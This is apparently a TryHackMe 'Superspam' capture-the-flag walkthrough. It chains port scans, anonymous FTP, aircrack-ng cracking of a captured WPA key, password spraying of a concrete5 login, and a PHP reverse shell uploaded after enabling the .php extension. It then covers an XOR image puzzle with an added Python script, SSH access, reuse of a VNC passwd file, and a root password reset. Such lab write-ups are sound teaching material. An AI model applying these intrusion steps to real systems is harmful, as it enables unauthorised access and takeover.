Room link - https://tryhackme.com/jr/superspamr
(Note to tester: the machine needs more resources to speed up this time)
This machine can take 5-10 minutes to setup.
Good luck and have fun solving it :)
-
rustscan -a 10.10.103.218
rustscan reports five open ports: 80, 4012, 4019, 5901 and 6001.
Let's use nmap to perform version detection on them:
nmap -sV 10.10.103.218 -p 80,4012,4019,5901,6001 -T4
Port 80 = HTTP
Port 4012 = SSH
Port 4019 = FTP
Port 5901 = VNC
A more aggressive scan of the web port (default scripts, OS and version detection):
nmap -A -p 80 -T4 ip
-
Let's log in to FTP as anonymous. FTP is on port 4019 (4012 is the SSH port):
ftp 10.10.103.218 4019
We can see a
note.txt
On the line dated 13th January, adam mentions that he has included a Wireshark capture file.
Let's run
ls -a
to see whether there are any hidden files. Yes, we were right: there is a hidden directory called
.cap
Let's navigate into that directory and check its contents.
It holds a file called SamsNetwork.cap, which we can download to our machine:
-rwxr--r-- 1 ftp ftp 370488 Feb 20 14:46 SamsNetwork.cap
get SamsNetwork.cap
Make sure the ftp client is in binary mode before the get (the ftp command for that is named binary), otherwise an ASCII-mode transfer can corrupt the capture. The file is now on our machine. Running aircrack-ng on it with no wordlist lists the networks in the capture and whether a WPA handshake was captured; with a wordlist it cracks the pre-shared key:
aircrack-ng SamsNetwork.cap -w /path/to/rockyou.txt
After some time it reports that the key was found.
Password : [REDACTED]
Now we have a password!
-
Let's check out the website.
Let's try to find usernames on the website. Click on Blog.
After viewing all the blog posts, I found these usernames:
- Adam_Admin
- Benjamin_Blogger
- Donald_dump
- Lucy_Loser
We have 1 password and 4 users, so let's try the cracked Wi-Fi password against each of them at the site's login page.
After trying the password for all users, the password [REDACTED] works for the user [REDACTED].
After login we land on the concrete5 dashboard:
http://ip/concrete5/index.php/dashboard/welcome
Scroll down a bit and click on any of the dashboard pages. The navigation buttons are in the top right.
Click on File Manager under the Files section, then on Upload Files.
Upload a PHP reverse shell (you can find one here). Download it to your machine first and change the IP address (and port, if you like) in it with a text editor so it points at your listener.
The upload is rejected: looks like
.php
is an invalid extension. Let's fix that. In the dashboard's Allowed File Types setting (under System & Settings), add
, php
at the end of the list and click Save.
Now let's try the upload again: File Manager, then
Upload Files
on the top right. Boom! It's successful. Click
close
Now set up a listener on our machine:
nc -lvnp 1234
(replace 1234 with the port you set in the PHP reverse shell script). Then open the uploaded file's link from the File Manager; when the web server executes it, you get a reverse shell.
Let's upgrade our shell with
python3 -c 'import pty;pty.spawn("/bin/bash")'
Navigate to
/home/personal
There are a lot of files there. To find the user flag we grep through all of them:
cat * | grep flag
Now go to
/home/lucy_loser
and list the files. We see a hidden directory
.MessagesBackupToGalactic
Let's navigate into that folder and view the files. We can see a lot of png files, a python file and a note.txt.
Let's pull all the pngs and the script to our machine with a python3 http server. Start it on the target while inside the .MessagesBackupToGalactic folder:
python3 -m http.server 2222
To fetch the files on your machine (ip is the target's address):
for f in c1 c2 c3 c4 c5 c6 c7 c8 c9; do wget ip:2222/$f.png; done
wget ip:2222/xored.py
Now let's run the
xored.py
script. For it to work you need Pillow installed:
pip3 install pillow
The script takes two png files and XORs them. After trying a lot of combinations I found that
c2.png
and
c8.png
worked. Let's view the newly made file
c28.png
[redacted]
It reveals a password.
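As an added example (not the room's xored.py, whose source the write-up does not show), the Python script below automates the trial-and-error above: it XORs every pair of candidate images and keeps the pair whose result has the fewest distinct colours, which is what a two-colour rendered password looks like once the random pad is removed. To run offline it writes its own constructed c1..c5.png (c2 is a random pad, c4 is that pad XORed with a two-colour message, the others are unrelated noise) with a minimal PNG writer, and its reader handles only the 8-bit RGB, filter-type-0 files that writer produces. For the real c*.png files replace decode_png with Pillow's Image.open(path).convert("RGB").tobytes(), since their filters and colour types are whatever the encoder chose. The file names, image size and the colour-count heuristic are assumptions made for this example.

```python
"""XOR-pair search over PNG images (added example; not the room's xored.py)."""
import itertools
import os
import random
import struct
import tempfile
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"


def encode_png(width, height, rgb):
    """Minimal 8-bit RGB PNG writer; every scanline uses filter type 0."""
    def chunk(tag, data):
        body = tag + data
        return struct.pack(">I", len(data)) + body + struct.pack(">I", zlib.crc32(body) & 0xFFFFFFFF)
    raw = b"".join(b"\x00" + rgb[y * width * 3:(y + 1) * width * 3] for y in range(height))
    ihdr = struct.pack(">IIBBBBB", width, height, 8, 2, 0, 0, 0)
    return PNG_SIG + chunk(b"IHDR", ihdr) + chunk(b"IDAT", zlib.compress(raw)) + chunk(b"IEND", b"")


def decode_png(data):
    """Reads what encode_png writes: 8-bit RGB, filter type 0, not interlaced.
    Assumption: the real c*.png may use other filters, so load those with Pillow."""
    if data[:8] != PNG_SIG:
        raise ValueError("not a PNG file")
    pos, width, height, idat = 8, 0, 0, b""
    while pos + 8 <= len(data):
        (length,) = struct.unpack(">I", data[pos:pos + 4])
        tag, body = data[pos + 4:pos + 8], data[pos + 8:pos + 8 + length]
        if tag == b"IHDR":
            width, height, depth, ctype = struct.unpack(">IIBB", body[:10])
            if (depth, ctype) != (8, 2):
                raise ValueError("only 8-bit RGB is handled here")
        elif tag == b"IDAT":
            idat += body
        pos += 12 + length  # 4 length + 4 tag + data + 4 crc
    raw, stride = zlib.decompress(idat), 1 + width * 3
    rows = [raw[y * stride:(y + 1) * stride] for y in range(height)]
    if any(r[0] != 0 for r in rows):
        raise ValueError("only filter type 0 is handled here")
    return width, height, b"".join(r[1:] for r in rows)


def xor_images(a, b):
    """Pixel-wise XOR of two (width, height, rgb_bytes) images of equal size."""
    if a[:2] != b[:2]:
        raise ValueError("image sizes differ")
    return a[0], a[1], bytes(x ^ y for x, y in zip(a[2], b[2]))


def distinct_colours(img):
    """Count distinct RGB triples: pad XOR (pad XOR picture) gives back the
    picture, which has few colours; any other pairing of the set stays noise."""
    px = img[2]
    return len({px[i:i + 3] for i in range(0, len(px), 3)})


def find_best_pair(images):
    """XOR every pair and return (i, j, result) with the fewest distinct colours."""
    best = None
    for i, j in itertools.combinations(range(len(images)), 2):
        out = xor_images(images[i], images[j])
        score = distinct_colours(out)
        if best is None or score < best[0]:
            best = (score, i, j, out)
    return best[1], best[2], best[3]


def build_demo_set(directory, seed=1, width=16, height=8):
    """Write constructed c1..c5.png: c2 is a random pad, c4 is that pad XORed
    with a two-colour message (white square on black); c1, c3, c5 are noise."""
    rnd = random.Random(seed)
    n = width * height * 3
    pad = bytes(rnd.getrandbits(8) for _ in range(n))
    msg = bytearray(n)
    for y in range(2, 6):
        for x in range(4, 8):
            msg[(y * width + x) * 3:(y * width + x) * 3 + 3] = b"\xff\xff\xff"
    paths = []
    for k in range(1, 6):
        if k == 2:
            px = pad
        elif k == 4:
            px = bytes(p ^ m for p, m in zip(pad, msg))
        else:
            px = bytes(rnd.getrandbits(8) for _ in range(n))
        paths.append(os.path.join(directory, f"c{k}.png"))
        with open(paths[-1], "wb") as fh:
            fh.write(encode_png(width, height, px))
    return paths


def recover(directory=None):
    """Build the demo set, pick the pair, write c<i><j>.png as the room's script does.
    Returns (i, j, colours_in_result) with 1-based image numbers; here (2, 4, 2)."""
    directory = directory or tempfile.mkdtemp()
    images = []
    for path in build_demo_set(directory):
        with open(path, "rb") as fh:
            images.append(decode_png(fh.read()))
    i, j, out = find_best_pair(images)
    with open(os.path.join(directory, f"c{i + 1}{j + 1}.png"), "wb") as fh:
        fh.write(encode_png(*out))
    return i + 1, j + 1, distinct_colours(out)
```

recover() returns (2, 4, 2) on the constructed set and writes c24.png next to the inputs, mirroring the c28.png naming from the room's script; the colour count of the winning pair is the same signal a human uses when one of the outputs suddenly looks like text instead of static.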
After trying each user, I found that the user
donalddump
can log in with that password. Let's SSH in as donalddump (SSH is on port 4012):
ssh donalddump@ip -p 4012
using the password found in the image. Browsing our own home directory gives
Permission denied
so let's fix the permissions on
/home/donalddump
chmod 777 /home/donalddump
(u+rwx for the owner would be enough here; 777 also opens the directory to every other user on the box.)
Now remember the VNC server on port 5901 from our nmap scan. Let's try to gain root through it.
Grab the VNC passwd file from donalddump's home directory. That file holds the VNC password DES-encrypted under a fixed key shared by every VNC implementation, so whoever holds the file effectively holds the password, and vncviewer accepts it directly.
Transfer it with a python http server on the target:
python3 -m http.server 1234
and on your machine:
wget ip:1234/passwd
Forward the VNC port over SSH, since we know donalddump's password:
ssh -L 5901:localhost:5901 donalddump@ip -p 4012
Note: make sure you have a VNC viewer installed; if not, install TigerVNC's viewer with:
sudo apt install tigervnc-viewer
Then run, on your machine:
vncviewer -passwd passwd_file localhost::5901
passwd_file is the file we transferred from Superspam, from the donalddump home directory. With the tunnel in place the viewer connects to your local port 5901; since nmap showed 5901 open on the target, ip::5901 would also work without the tunnel.
The VNC desktop is running as root, so we can change the root password from its terminal and then log in as root from
ssh
passwd
I changed the password to
1234
Now run
su root
in the donalddump ssh shell. (On a real engagement, resetting root's password is a loud and destructive change; here it is just the room's intended path.) As root we see an unusual hidden directory called
.nothing
Let's browse into it and check its contents. We see a
r00t.txt
file. Let's get the contents of the file:
cat r00t.txt
Copy the "what am i?" string and paste it into CyberChef; its Magic operation can identify the encoding and decode it.
Now we get the decoded string, which contains the root flag!
Root_flag: flag{REDACTED}
-